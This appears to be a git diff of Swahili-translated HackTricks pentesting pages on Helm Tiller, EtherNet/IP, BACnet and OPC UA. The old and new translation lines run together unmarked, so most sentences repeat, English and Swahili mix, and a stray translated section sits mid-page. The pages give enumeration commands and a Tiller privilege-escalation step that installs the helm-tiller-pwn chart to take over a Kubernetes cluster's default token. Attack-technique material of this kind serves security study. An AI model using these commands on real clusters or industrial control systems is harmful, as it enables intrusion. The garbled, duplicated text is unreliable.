Helm ni **meneja wa pakiti** kwa Kubernetes. Inaruhusu kufunga faili za YAML na kuzisambaza katika hifadhi za umma na za kibinafsi. Pakiti hizi zinaitwa **Helm Charts**. **Tiller** ni **huduma** **inayoendesha** kwa chaguo-msingi katika bandari 44134 ikitoa huduma hiyo.
**Bandari ya chaguo-msingi:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
# Uchambuzi
# Enumeration
Ikiwa unaweza **kuchambua pods na/au huduma** za majina tofauti, chambua na tafuta zile zenye **"tiller" katika jina lao**:
Ikiwa unaweza **kuorodhesha pods na/au huduma** za majimbo tofauti, orodhesha hizo na tafuta zile zenye **"tiller" katika jina lao**:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
@ -33,39 +34,7 @@ kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
**Swahili Translation:**
# Pentesting Tiller (Helm)
Helm ni chombo cha usimamizi wa mfuko wa Kubernetes ambacho kinatumika kusimamia na kusambaza programu zilizojengwa kwenye mfumo wa Kubernetes. Tiller ni sehemu ya Helm ambayo inaruhusu watumiaji kusimamia na kudhibiti vifurushi vya programu kwenye mfumo wa Kubernetes.
## Kuchunguza Tiller
Kabla ya kuanza kuchunguza Tiller, ni muhimu kuelewa jinsi inavyofanya kazi na jinsi inavyoshirikiana na mfumo wa Kubernetes. Tiller hutumia gRPC (itifaki ya mawasiliano ya mbali) kwa mawasiliano yake na Kubernetes API server. Kwa hivyo, ni muhimu kuelewa jinsi gRPC inavyofanya kazi na jinsi ya kuchunguza mawasiliano yake.
## Kuvunja Tiller
Kuna njia kadhaa za kuvunja Tiller na kupata udhibiti juu ya mfumo wa Kubernetes. Hapa kuna baadhi ya mbinu zinazoweza kutumika:
1. **Kuvunja Tiller kupitia kuingilia kati kwa trafiki**: Unaweza kuchunguza mawasiliano kati ya Tiller na Kubernetes API server na kuingilia kati kwa trafiki ili kudhibiti mawasiliano hayo. Hii inaweza kufanyika kwa kutumia zana kama mitambo ya kati (man-in-the-middle) au kuvunja SSL/TLS.
2. **Kuvunja Tiller kupitia udhaifu wa usalama**: Unaweza kutafuta udhaifu wa usalama katika Tiller au katika mazingira ya Kubernetes ili kupata udhibiti juu ya mfumo. Hii inaweza kujumuisha kutafuta udhaifu katika toleo la Tiller, kutumia vibaya vibali vya kutosha au kutumia mbinu zingine za kuvunja usalama.
3. **Kuvunja Tiller kupitia mizigo ya Helm**: Unaweza kutumia mizigo ya Helm ili kuvunja Tiller na kupata udhibiti juu ya mfumo wa Kubernetes. Hii inaweza kujumuisha kutumia mizigo ya Helm iliyoundwa kwa makusudi ili kudhibiti Tiller au kutumia mizigo ya Helm iliyoundwa na watumiaji wengine ambayo inaweza kuwa na udhaifu.
## Kuzuia Mashambulizi ya Tiller
Ili kuzuia mashambulizi ya Tiller, kuna hatua kadhaa unazoweza kuchukua:
1. **Funga Tiller**: Ikiwa hauitumii Tiller, unaweza kufunga kabisa ili kuzuia mashambulizi yoyote yanayolenga chombo hicho.
2. **Sasisha Tiller**: Hakikisha kuwa una toleo la karibuni la Tiller na kwamba umesasisha mara kwa mara ili kuepuka udhaifu uliojulikana.
3. **Sanidi vibali vya Tiller**: Hakikisha kuwa vibali vya Tiller vimesanidiwa kwa usahihi ili kuzuia ufikiaji usioidhinishwa.
4. **Tumia usimbuaji wa trafiki**: Tumia usimbuaji wa trafiki kati ya Tiller na Kubernetes API server ili kuzuia kuingiliwa kwa trafiki na kudhibiti mawasiliano.
Kwa kuzingatia hatua hizi za kuzuia, unaweza kusaidia kulinda mfumo wako wa Kubernetes na kuzuia mashambulizi ya Tiller.
Mifano:
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
@ -77,39 +46,39 @@ NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S)
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
Unaweza pia jaribu kupata huduma hii kwa kuangalia bandari 44134 inayotumika:
Unaweza pia kujaribu kupata huduma hii ikifanya kazi ukikagua bandari 44134:
```bash
sudo nmap -sS -p 44134 <IP>
```
Baada ya kuigundua, unaweza kuwasiliana nayo kwa kupakua programu ya mteja ya helm. Unaweza kutumia zana kama `homebrew`, au angalia [**ukurasa rasmi wa matoleo**](https://github.com/helm/helm/releases)**.** Kwa maelezo zaidi, au chaguo nyingine, angalia [mwongozo wa ufungaji](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Mara tu umepata, unaweza kuwasiliana nayo kwa kupakua programu ya mteja helm. Unaweza kutumia zana kama `homebrew`, au angalia [**ukurasa rasmi wa toleo**](https://github.com/helm/helm/releases)**.** Kwa maelezo zaidi, au kwa chaguzi nyingine, angalia [mwongozo wa usakinishaji](https://v2.helm.sh/docs/using\_helm/#installing-helm).
Kisha, unaweza **kutambua huduma**:
Kisha, unaweza **kuorodhesha huduma**:
```
helm --host tiller-deploy.kube-system:44134 version
```
## Kupandisha Uthamani
## Privilege Escalation
Kwa chaguo-msingi, **Helm2** ilisakinishwa katika **namespace kube-system** na **uthamani wa juu**, kwa hivyo ikiwa utapata huduma hiyo na una ufikiaji wake, hii inaweza kukuruhusu **kupandisha uthamani**.
Kwa default **Helm2** ilifungwa katika **namespace kube-system** ikiwa na **mamlaka ya juu**, hivyo ikiwa utapata huduma hiyo na una ufikiaji wake, hii inaweza kukuruhusu **kuinua mamlaka**.
Unachohitaji kufanya ni kusakinisha pakiti kama hii: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) ambayo itampa **ufikiaji wa alama ya huduma ya chaguo-msingi kwa kila kitu katika kikundi kizima.**
Unachohitaji kufanya ni kufunga kifurushi kama hiki: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) ambacho kitatoa **ufikiaji wa token ya huduma ya default kwa kila kitu katika klasta nzima.**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
Katika [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) una **maelezo ya shambulio**, lakini kwa msingi, ikiwa unasoma faili [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) na [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) ndani ya _helm-tiller-pwn/pwnchart/templates/_ unaweza kuona jinsi **mamlaka zote zinavyotolewa kwa token ya chaguo-msingi**.
Katika [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) una **maelezo ya shambulio**, lakini kimsingi, ukisoma faili [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) na [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) ndani ya _helm-tiller-pwn/pwnchart/templates/_ unaweza kuona jinsi **haki zote zinavyotolewa kwa token ya kawaida**.
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

42
network-services-pentesting/44818-ethernetip.md
View file

@ -1,28 +1,29 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# **Taarifa za Itifaki**
# **Taarifa ya Protokali**
EtherNet/IP ni **itifaki ya mtandao wa Ethernet ya viwandani** inayotumiwa kawaida katika **mifumo ya udhibiti wa kiotomatiki ya viwandani**. Iliundwa na Rockwell Automation katika miaka ya 1990 na inasimamiwa na ODVA. Itifaki hii inahakikisha **ushirikiano wa mfumo kutoka kwa wauzaji tofauti** na hutumiwa katika matumizi mbalimbali kama vile **mitambo ya kusindika maji**, **vituo vya utengenezaji**, na **huduma za umma**. Ili kutambua kifaa cha EtherNet/IP, ombi hutumwa kwa **TCP/44818** na **Ujumbe wa Kitambulisho cha Orodha (0x63)**.
EtherNet/IP ni **protokali ya mtandao wa Ethernet wa viwanda** inayotumika sana katika **mifumo ya udhibiti wa automatisering wa viwanda**. Ilitengenezwa na Rockwell Automation mwishoni mwa miaka ya 1990 na inasimamiwa na ODVA. Protokali hii inahakikisha **uendeshaji wa mifumo ya wauzaji wengi** na inatumika katika matumizi mbalimbali kama vile **mimea ya usindikaji wa maji**, **vifaa vya utengenezaji**, na **huduma za umma**. Ili kubaini kifaa cha EtherNet/IP, ombi linawekwa kwa **TCP/44818** na **ujumbe wa Orodha ya Vitambulisho (0x63)**.
**Bandari ya chaguo-msingi:** 44818 UDP/TCP
**Bandari ya kawaida:** 44818 UDP/TCP
```
PORT STATE SERVICE
44818/tcp open EtherNet/IP
```
# **Uthibitishaji**
# **Uhesabu**
```bash
nmap -n -sV --script enip-info -p 44818 <IP>
pip3 install cpppo
@ -33,16 +34,17 @@ python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity
* `port:44818 "jina la bidhaa"`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

46
network-services-pentesting/47808-udp-bacnet.md
View file

@ -1,30 +1,31 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa za Itifaki
# Taarifa ya Protokali
**BACnet** ni **itifaki ya mawasiliano** kwa mitandao ya Udhibiti na Uendeshaji wa Majengo (BAC) ambayo inatumia **itifaki ya kiwango cha ASHRAE**, **ANSI**, na **ISO 16484-5**. Inarahisisha mawasiliano kati ya mifumo ya udhibiti na uendeshaji wa majengo, ikiruhusu matumizi kama udhibiti wa HVAC, udhibiti wa taa, udhibiti wa ufikiaji, na mifumo ya kugundua moto kubadilishana habari. BACnet inahakikisha uwezo wa kufanya kazi pamoja na kuruhusu vifaa vya kiotomatiki vya udhibiti wa majengo kuzungumza, bila kujali huduma maalum wanazotoa.
**BACnet** ni **protokali ya mawasiliano** kwa ajili ya Mitandao ya Usimamizi na Udhibiti wa Majengo (BAC) inayotumia **ASHRAE**, **ANSI**, na **ISO 16484-5 standard** protokali. Inarahisisha mawasiliano kati ya mifumo ya usimamizi na udhibiti wa majengo, ikiruhusu programu kama vile udhibiti wa HVAC, udhibiti wa mwanga, udhibiti wa ufikiaji, na mifumo ya kugundua moto kubadilishana taarifa. BACnet inahakikisha ufanisi wa kazi pamoja na kuruhusu vifaa vya usimamizi wa majengo vilivyokamilishwa na kompyuta kuwasiliana, bila kujali huduma maalum wanazotoa.
**Bandari ya chaguo:** 47808
**Bandari ya kawaida:** 47808
```text
PORT STATE SERVICE
47808/udp open BACNet -- Building Automation and Control NetworksEnumerate
```
# Uchambuzi
# Uhesabu
## Kwa Mkono
## Mikono
```bash
pip3 install BAC0
pip3 install netifaces
@ -50,7 +51,7 @@ print(f"Version: {readDevice[2]}")
```bash
nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 <IP>
```
Hati hii haina jaribio la kujiunga na mtandao wa BACnet kama kifaa cha kigeni, badala yake inatuma maombi ya BACnet moja kwa moja kwa kifaa chenye anwani ya IP.
This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device.
## Shodan
@ -59,16 +60,17 @@ Hati hii haina jaribio la kujiunga na mtandao wa BACnet kama kifaa cha kigeni, b
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

52
network-services-pentesting/4840-pentesting-opc-ua.md
View file

@ -1,60 +1,62 @@
# 4840 - Pentesting OPC UA
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
**OPC UA**, ikimaanisha **Open Platform Communications Unified Access**, ni itifaki muhimu ya chanzo wazi inayotumiwa katika viwanda mbalimbali kama vile Uzalishaji, Nishati, Anga, na Ulinzi kwa kubadilishana data na kudhibiti vifaa. Inawezesha vifaa kutoka wauzaji tofauti kuwasiliana, hasa na PLCs.
**OPC UA**, inamaanisha **Open Platform Communications Unified Access**, ni protokali muhimu ya chanzo wazi inayotumika katika sekta mbalimbali kama vile Utengenezaji, Nishati, Anga, na Ulinzi kwa ajili ya kubadilishana data na kudhibiti vifaa. Inaruhusu vifaa vya wauzaji tofauti kuwasiliana, hasa na PLCs.
Usanidi wake unaruhusu hatua kali za usalama, lakini mara nyingi, kwa utangamano na vifaa vya zamani, hatua hizi hupunguzwa, na hivyo kuweka mifumo katika hatari. Aidha, kupata huduma za OPC UA inaweza kuwa ngumu kwani skana za mtandao huenda zisizigundue ikiwa ziko kwenye bandari zisizostahili.
Mipangilio yake inaruhusu hatua kali za usalama, lakini mara nyingi, ili kuendana na vifaa vya zamani, hizi hupunguzwa, na kuweka mifumo katika hatari. Zaidi ya hayo, kupata huduma za OPC UA kunaweza kuwa ngumu kwani skana za mtandao zinaweza kutoweza kuzitambua ikiwa ziko kwenye bandari zisizo za kawaida.
**Bandari ya chaguo-msingi:** 4840
**Bandari ya kawaida:** 4840
```text
PORT STATE SERVICE REASON
4840/tcp open unknown syn-ack
```
## Pentesting OPC UA
Ili kugundua masuala ya usalama katika seva za OPC UA, skani kwa kutumia [OpalOPC](https://opalopc.com/).
Ili kufichua masuala ya usalama katika seva za OPC UA, scan na [OpalOPC](https://opalopc.com/).
```bash
opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port
```
### Kudukua udhaifu
### Kutumia udhaifu
Ikiwa udhaifu wa kuthibitisha utambulisho unapatikana, unaweza kusanidi [mteja wa OPC UA](https://www.prosysopc.com/products/opc-ua-browser/) kulingana na hilo na kuona unaweza kupata nini. Hii inaweza kuruhusu kusoma tu thamani za mchakato au hata kufanya kazi na vifaa vya viwandani vya kazi nzito.
Ikiwa udhaifu wa kupita uthibitisho umepatikana, unaweza kuunda [mteja wa OPC UA](https://www.prosysopc.com/products/opc-ua-browser/) ipasavyo na kuona unachoweza kufikia. Hii inaweza kuruhusu chochote kutoka kwa kusoma tu thamani za mchakato hadi kufanya kazi na vifaa vya viwandani vya nguvu.
Ili kupata wazo la kifaa unachoweza kupata, soma thamani za nodi ya "ServerStatus" katika nafasi ya anwani na tafuta kwenye Google kwa mwongozo wa matumizi.
Ili kupata wazo la kifaa unachofikia, soma thamani za nodi "ServerStatus" katika nafasi ya anwani na utafute mwongozo wa matumizi.
## Shodan
* `port:4840`
## Marejeo
## Marejeleo
* [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

68
network-services-pentesting/49-pentesting-tacacs+.md
View file

@ -1,20 +1,21 @@
# 49 - Kupima Usalama wa TACACS+
